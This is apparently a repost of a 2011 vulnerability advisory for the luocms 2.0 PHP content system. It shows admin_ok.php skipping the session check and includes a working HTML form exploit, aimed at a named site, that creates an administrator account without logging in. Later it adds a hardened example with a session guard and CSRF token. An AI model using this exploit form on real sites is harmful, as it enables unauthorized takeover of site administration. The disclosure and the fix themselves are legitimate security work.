luocms 2.0 add administrator vulnerability...attached to the POST EXP-vulnerability warning-the black bar safety net

2011-01-12T00:00:00
ID MYHACK58:62201128835
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-01-12T00:00:00

Description

LUOCMS is an article management system built on PHP+MySQL. It is easy to use, built entirely on a DIV+CSS layout, generates static HTML for the whole site, and has a clean internal structure, which makes it well suited to website optimization and promotion.

The author's reasoning was that pages the user never sees directly might have been left without session authentication, so they were never checked. Look again at the code in admin\manager\admin_ok.php:

<?php
require_once '../../inc/const.php';  // connect to the database
// Unlike the other admin files, this one never verifies that session(username) exists......

$act = trim($_GET['act']);  // not otherwise sanitized
$id  = getvar('id');        // getvar is defined in const.php and applies addslashes

// Add data
if ($act == 'add') {
    if (check_username($_POST['username'])) {
        // the only check performed: reject a duplicate administrator name
        exit("<script>alert('User ".$_POST['username']." already exists!'); window.history.go(-1)</script>");
    }

    $record = array(
        'username'     => $_POST['username'],
        'password'     => md5($_POST['password']),
        'addtime'      => date("Y-m-d H:i:s"),
        'supermanager' => $_SESSION['supermanager'] + 1  // supermanager is not validated; it does not matter here
    );
    $id = $db->insert($GLOBALS[databasePrefix].'manager', $record);  // written straight to the database
    echo "<script>alert('Added successfully!'); window.location='admin_manage.php';</script>";
}
// The code that follows (modify and delete) is omitted

Attached: the POST EXP

<form method="post" action="http://www.hackqing.com/admin/manager/admin_ok.php?act=add" enctype="multipart/form-data" id="upload">
  <label><input name="username" type="text" value="Beijing" /></label>
  <label><input name="password" type="text" value="qing520" /></label>
  <div></div>
  <input name="respondids" value="OK to modify" class="coolbg np" type="submit">
</form>

This is not the only place: database backup and adding news behave the same way. Anything that is not visible to an ordinary user was simply never given an authentication check.
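The fix is to make every admin-side script refuse the request before it looks at act or any POST field, rather than relying on the page being hard to find. The fragment below is an added example written for this page, not code from luocms. It assumes that the login page stores $_SESSION['username'] and $_SESSION['supermanager'] on a successful login (the original file already reads $_SESSION['supermanager']), that check_username, getvar and $db still come from inc/const.php, and that ../login.php is the login page (a placeholder path). It also adds a per-session form token, which the shown code does not have; without one, a form like the EXP above could still be submitted on behalf of an administrator who is already logged in.

```php
<?php
// Added example (not luocms code): hardened head for admin/manager/admin_ok.php.
session_start();
require_once '../../inc/const.php';   // database connection, getvar(), check_username(), $db

// Reject any request that does not carry an authenticated admin session.
// Runs before $_GET['act'] or any $_POST field is examined.
function require_admin_session(): void
{
    if (empty($_SESSION['username']) || !isset($_SESSION['supermanager'])) {
        header('Location: ../login.php');   // hypothetical login page path
        exit;
    }
}

// Require the token issued with the admin form, so a state-changing POST
// must originate from a page this session rendered. The form must include
// <input type="hidden" name="csrf_token" value="<?= $_SESSION['csrf_token'] ?>">
function require_csrf_token(): void
{
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid request token.');
    }
}

// Issue a token once per session for the admin forms to embed.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

require_admin_session();

$act = trim($_GET['act'] ?? '');
$id  = getvar('id');

if ($act === 'add') {
    require_csrf_token();

    $username = trim($_POST['username'] ?? '');
    $password = $_POST['password'] ?? '';
    if ($username === '' || $password === '') {
        exit('Username and password are required.');
    }
    if (check_username($username)) {
        exit("<script>alert('User already exists!'); window.history.go(-1)</script>");
    }

    $record = array(
        'username'     => $username,
        'password'     => md5($password),   // unchanged here so the existing login check keeps working
        'addtime'      => date('Y-m-d H:i:s'),
        'supermanager' => (int)$_SESSION['supermanager'] + 1,
    );
    $id = $db->insert($GLOBALS[databasePrefix].'manager', $record);
    echo "<script>alert('Added successfully!'); window.location='admin_manage.php';</script>";
}
// modify and delete branches follow, each behind the same two checks
```

Because the same two functions belong at the top of every admin script (backup, news, manager), the practical way to apply this is to move them into a shared include that is required first in each file, so that a newly added admin page cannot forget the check the way admin_ok.php did.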

Program download addresses:
Local download: http://www.luocms.com/down/luocms_V1.100606_UTF8.rar
chinaz webmaster station download: http://down.chinaz.com/soft/26349.htm
A5 webmaster station download: http://down.admin5.com/code_php/24114.html

Author: mind